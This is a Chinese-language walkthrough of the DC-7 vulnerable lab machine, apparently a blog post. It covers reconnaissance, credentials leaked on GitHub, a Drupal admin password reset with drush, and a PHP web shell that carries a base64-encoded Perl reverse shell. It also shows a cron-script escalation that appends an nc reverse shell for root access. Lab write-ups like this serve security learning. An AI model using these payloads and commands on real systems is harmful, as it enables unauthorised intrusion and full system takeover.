DC--7

信息收集

确定IP地址

netdiscover -i eth0 -r 192.168.84.0/24

image-20221221141416878

扫描端口

image-20221221141648412

nmap 漏洞扫描

image-20221221142103351

WEB测试

基于网站的信息收集

image-20221221141921572

最终在github上面发现代码泄露

https://github.com/Dc7User/staffdb

image-20221221142257061

在config.php文件中发现账户与密码

image-20221221142520103

经测试,可登录ssh

image-20221221142903970

在当前目录下有一个mbox文件

调用了这个脚本

image-20221221143946586

查看当前目录下的文件,backups里面有两个加密文件,不可利用,查看mbox文件,发现是一个计划任务 自动备份数据库的执行情况,调用的脚本是/opt/scripts/backups.sh,是root权限执行的

image-20221221144211049

注意:drush是专门用来管理Drupal站点的shell,可以用来修改密码

故修改站点密码

先进入网站所在的目录

image-20221221144444315

通过以下命令发现管理员账号admin

drush user-information admin

image-20221221144538552

修改admin账户的密码

drush upwd admin --password="passwd"

image-20221221144613318

以当前的账户密码登录网站后台

image-20221221144713358

写入反弹shell

该位置可以编写文章,但是没有php形式

image-20221221144929145

安装支持php语言的插件

插件链接:https://ftp.drupal.org/files/projects/php-8.x-1.x-dev.tar.gz

image-20221221145138623

安装成功image-20221221145302753

提示:如果报错,则重新安装即可

回到模块中,勾选php安装,安装完成后在内容编辑的地方出现了PHP code

image-20221221145452096

在该页面写入反弹shell

image-20221221145753384

<?php
function which($pr) {
	$path = execute("which $pr");
	return ($path ? $path : $pr);
	}
function execute($cfe) {
	$res = '';
	if ($cfe) {
		if(function_exists('exec')) {
			@exec($cfe,$res);
			$res = join("\n",$res);
			} 
			elseif(function_exists('shell_exec')) {
			$res = @shell_exec($cfe);
			} elseif(function_exists('system')) {
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
} elseif(function_exists('passthru')) {
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
} elseif(@is_resource($f = @popen($cfe,"r"))) {
$res = '';
while(!@feof($f)) {
$res .= @fread($f,1024);
}
@pclose($f);
}
}
return $res;
}
function cf($fname,$text){
if($fp=@fopen($fname,'w')) {
@fputs($fp,@base64_decode($text));
@fclose($fp);
}
}
$yourip = "192.168.84.174";  #监听ip
$yourport = '10086';   #监听端口
$usedb = array('perl'=>'perl','c'=>'c');
$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj".
"aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR".
"hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT".
"sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI".
"kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi".
"KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl".
"OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
cf('/tmp/.bc',$back_connect);
$res = execute(which('perl')." /tmp/.bc $yourip $yourport &");
?> 

本地开启监听状态

image-20221221150142003

提权

获取标准的终端

python -c "import pty;pty.spawn('/bin/bash')"

image-20221221150302813

利用定时任务提权

追加一个反弹shell到定时任务中,即可

echo "nc -e /bin/bash 192.168.84.174 5555" >> /opt/scripts/backups.sh

image-20221221150603684

本地监听5555端口,等待backups.sh文件定时执行root权限就好了

image-20221221150730094

获取标准的终端

python -c "import pty;pty.spawn('/bin/bash')"

image-20221221151558304

flag

image-20221221151650272

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值